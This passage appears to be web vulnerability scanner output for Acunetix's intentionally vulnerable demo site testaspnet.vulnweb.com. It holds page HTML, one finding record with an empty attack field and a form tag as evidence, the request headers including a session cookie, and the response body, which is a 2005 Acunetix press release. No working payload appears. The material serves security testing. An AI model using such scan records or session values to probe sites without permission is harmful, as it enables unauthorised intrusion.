11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1">
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site 